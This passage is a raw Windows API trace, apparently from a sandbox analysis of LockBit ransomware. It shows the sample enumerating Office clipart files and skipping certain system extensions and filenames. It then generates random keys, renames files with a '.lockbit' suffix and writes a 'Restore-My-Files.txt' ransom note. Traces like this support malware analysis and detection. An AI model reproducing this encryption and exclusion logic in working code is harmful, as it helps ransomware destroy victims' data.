lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0105.619] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0105.620] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0105.620] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.lockbit") returned 72 [0105.620] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07831_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0105.629] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0105.629] malloc (_Size=0x40068) returned 0x1ff1e60 [0105.629] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=4066) returned 1 [0105.629] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0105.630] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.630] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.630] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0105.630] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0105.677] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0105.677] malloc (_Size=0xa6) returned 0x77d800 [0105.677] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0105.677] free (_Block=0x77d800) [0105.677] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07831_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0105.677] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0105.677] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0105.677] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5178e0b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x5f00, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD08758_.WMF", cAlternateFileName="")) returned 1 [0105.677] lstrcmpiW (lpString1=".", lpString2="BD08758_.WMF") returned -1 [0105.677] lstrcmpiW (lpString1="..", lpString2="BD08758_.WMF") returned -1 [0105.678] PathFindExtensionW (pszPath="BD08758_.WMF") returned=".WMF" [0105.678] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.678] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0105.679] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0105.679] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0105.680] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0105.680] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD08758_.WMF") returned 1 [0105.680] lstrcmpiW (lpString1="ntldr", lpString2="BD08758_.WMF") returned 1 [0105.680] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD08758_.WMF") returned 1 [0105.680] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD08758_.WMF") returned 1 [0105.680] lstrcmpiW (lpString1="autorun.inf", lpString2="BD08758_.WMF") returned -1 [0105.680] lstrcmpiW (lpString1="thumbs.db", lpString2="BD08758_.WMF") returned 1 [0105.680] lstrcmpiW (lpString1="iconcache.db", lpString2="BD08758_.WMF") returned 1 [0105.680] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0105.680] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF") returned=".WMF" [0105.680] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0105.680] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0105.680] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0105.680] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0105.680] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0105.681] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0105.682] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.lockbit") returned 72 [0105.682] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08758_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0105.682] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0105.682] malloc (_Size=0x40068) returned 0x1ff1e60 [0105.682] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=24320) returned 1 [0105.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.683] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.683] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0105.683] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.684] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.684] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0105.684] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0105.700] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0105.700] malloc (_Size=0xa6) returned 0x77d800 [0105.700] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0105.781] free (_Block=0x77d800) [0105.781] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08758_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0105.781] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0105.781] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0105.781] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x60ca, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD08773_.WMF", cAlternateFileName="")) returned 1 [0105.781] lstrcmpiW (lpString1=".", lpString2="BD08773_.WMF") returned -1 [0105.781] lstrcmpiW (lpString1="..", lpString2="BD08773_.WMF") returned -1 [0105.781] PathFindExtensionW (pszPath="BD08773_.WMF") returned=".WMF" [0105.781] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0105.781] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0105.781] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0105.781] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0105.781] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0105.782] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0105.782] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="BD08773_.WMF") returned 1 [0105.783] lstrcmpiW (lpString1="ntldr", lpString2="BD08773_.WMF") returned 1 [0105.783] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="BD08773_.WMF") returned 1 [0105.783] lstrcmpiW (lpString1="bootsect.bak", lpString2="BD08773_.WMF") returned 1 [0105.783] lstrcmpiW (lpString1="autorun.inf", lpString2="BD08773_.WMF") returned -1 [0105.783] lstrcmpiW (lpString1="thumbs.db", lpString2="BD08773_.WMF") returned 1 [0105.783] lstrcmpiW (lpString1="iconcache.db", lpString2="BD08773_.WMF") returned 1 [0105.783] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0105.783] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned=".WMF" [0105.783] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0105.783] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0105.783] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0105.784] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0105.784] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.lockbit") returned 72 [0105.784] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x81c [0105.785] CreateIoCompletionPort (FileHandle=0x81c, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0105.785] malloc (_Size=0x40068) returned 0x1ff1e60 [0105.785] GetFileSizeEx (in: hFile=0x81c, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=24778) returned 1 [0105.785] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0105.786] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0105.786] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0105.786] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0105.786] ReadFile (in: hFile=0x81c, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0106.287] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0106.287] malloc (_Size=0xa6) returned 0x77d800 [0106.288] NtSetInformationFile (FileHandle=0x81c, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d800, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0106.295] free (_Block=0x77d800) [0106.295] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0106.296] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0106.296] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0106.296] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x5f455930, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xbb7c, dwReserved0=0x0, dwReserved1=0x0, cFileName="BD08808_.WMF", cAlternateFileName="")) returned 1 [0106.296] lstrcmpiW (lpString1=".", lpString2="BD08808_.WMF") returned -1 [0106.296] lstrcmpiW (lpString1="..", lpString2="BD08808_.WMF") returned -1 [0106.296] PathFindExtensionW (pszPath="BD08808_.WMF") returned=".WMF" [0106.296] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0106.296] lstrcmpiW (lpString1=".ocx", 